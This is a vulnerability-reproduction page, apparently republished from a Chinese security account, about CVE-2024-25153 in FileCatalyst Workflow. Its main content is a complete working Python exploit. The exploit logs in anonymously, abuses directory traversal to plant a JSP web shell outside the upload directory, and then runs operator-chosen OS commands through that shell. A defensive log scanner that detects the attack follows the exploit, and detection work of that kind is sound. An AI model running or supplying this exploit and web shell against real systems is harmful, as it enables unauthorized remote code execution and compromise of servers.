Vulnerability description
FileCatalyst Workflow versions before 5.1.6 Build 114 contain an insecure file upload and directory traversal vulnerability in /workflow/servlet/ftpservlet. A crafted POST request can upload a malicious file to a location outside the restricted uploadtemp directory, which leads to remote code execution.
Asset mapping
FOFA:
Vulnerability reproduction
https://github.com/nettitude/CVE-2024-25153/blob/master/CVE-2024-25153.py
```python
#!/usr/bin/python3
"""
Exploit for CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Workflow 5.x, before 5.1.6 Build 114
Full details can be found at https://labs.nettitude.com/blog/cve-2024-25153-remote-code-execution-in-fortra-filecatalyst
Usage: CVE-2024-25153.py --host {hostname} --port {port} --url {url} --cmd {command}
"""

import requests
import argparse
import re
import uuid
import urllib.parse


def exploit(host, port, url, cmd, secret):
    s = requests.Session()
    try:
        session_response = s.get(f"{host}:{port}/{url}")

        # Find session token (raw string so the regex escapes are not treated as Python escapes)
        session_pattern = r"\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+"
        if re.search(session_pattern, session_response.text) is None:
            print("[-] => Error getting session token. Check the -u parameter is correct.")
            return

        # Redirect to main login
        redirect = re.findall(session_pattern, session_response.text)[0]
        redirect_response = s.get(f"{host}:{port}{redirect}")

        # Perform anonymous login
        login_pattern = r"\/workflow\/logonAnonymous.do\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+"
        if re.search(login_pattern, redirect_response.text) is None:
            print("[-] => Error logging in. Check anonymous login is enabled.")
            return
        login = re.findall(login_pattern, redirect_response.text)[0]
        login_response = s.get(f"{host}:{port}{login}")

        # Upload our shell
        exploit_url = f"{host}:{port}/{url}/servlet/ftpservlet?wf=octetStream&h=example.com&u=%58%58&p=%58%58&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/"
        # WARNING: Take great care if modifying the upload path (sid parameter).
        # Attempting to upload in the top-level web root will delete the entire application.
        exploit_headers = {
            "User-Agent": "CVE-2024-25153",
            "Content-Type": "application/octet-stream",
            "X-File-Name": secret + ".jsp",
        }
        exploit_data = """<%@ page import=\"java.util.*,java.io.*\"%>
<%
if (request.getParameter(\"cmd\") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>"""
        exploit_response = s.post(exploit_url, headers=exploit_headers, data=exploit_data)
        if "success" not in exploit_response.text:
            print("[-] => Error uploading file. Target may not be vulnerable.")
            return

        # Call the shell
        cmd_safe = urllib.parse.quote(cmd)
        cmd_response = s.get(f"{host}:{port}/{url}/CVE-2024-25153/{secret}.jsp?cmd={cmd_safe}")
        print(cmd_response.text.strip())
    except requests.exceptions.RequestException as e:
        print(f"[-] => Error occurred for {url}. Target may not be vulnerable.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--host", type=str, help="target hostname or IP address (include http:// or https://)", required=True)
    parser.add_argument("-p", "--port", type=int, default=8080, help="target port (Default: 8080)")
    parser.add_argument("-u", "--url", type=str, default="workflow", help="URL where FileCatalyst Workflow is installed (Default: workflow)")
    parser.add_argument("-c", "--cmd", type=str, default="id", help="OS command to run (Default: id)")
    args = parser.parse_args()
    exploit(args.host, args.port, args.url, args.cmd, str(uuid.uuid4()))
```
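As an added defender-side example (not part of the original article or of the nettitude PoC), the following Python flags web-server access-log entries that match the upload pattern described above: a PUT to /workflow/servlet/ftpservlet whose sid parameter traverses out of the upload directory, or a request carrying the PoC's User-Agent string. The log lines, IPs and timestamps are constructed, and the parsing regex assumes the combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /workflow HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "POST /workflow/servlet/ftpservlet?wf=octetStream&h=example.com&u=%58%58&p=%58%58&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/ HTTP/1.1" 200 45 "-" "CVE-2024-25153"
10.0.0.7 - - [01/Mar/2024:10:05:00 +0000] "POST /workflow/servlet/ftpservlet?wf=octetStream&c=PUT&sid=job42/ HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2024:10:06:00 +0000] "POST /workflow/servlet/ftpservlet?c=PUT&sid=%252e%252e%252fjsp%252f HTTP/1.1" 200 45 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def analyse_line(line):
    """Return None for lines that do not hit ftpservlet, else a dict with the reasons it looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/servlet/ftpservlet"):
        return None
    qs = parse_qs(parts.query)
    cmd = qs.get("c", [""])[0].upper()
    # parse_qs decodes once; decode again so double-encoded "%252e%252e%252f" is seen as "../"
    sid = unquote(qs.get("sid", [""])[0])
    reasons = []
    # sid is joined under uploadtemp by the servlet, so any ".." segment escapes that directory
    if cmd == "PUT" and ".." in sid.replace("\\", "/").split("/"):
        reasons.append("traversal in sid")
    if "CVE-2024-25153" in m.group("ua"):
        reasons.append("known PoC user-agent")
    return {"ip": m.group("ip"), "status": int(m.group("status")), "reasons": reasons}


def find_exploit_attempts(log_text):
    """Scan a whole log and return only the entries that have at least one reason."""
    hits = []
    for line in log_text.splitlines():
        r = analyse_line(line)
        if r and r["reasons"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged PUT deserves a follow-up check of the web root for unexpected .jsp files, since the page notes the upload succeeds silently on unpatched builds.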
Originally published on the WeChat public account 漏洞文库: [Vulnerability Reproduction] Fortra FileCatalyst Workflow Remote Code Execution Vulnerability (CVE-2024-25153)
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. If you have questions, contact us by email (use a corporate or otherwise valid mailbox to avoid the mail being blocked; contact details are on the home page).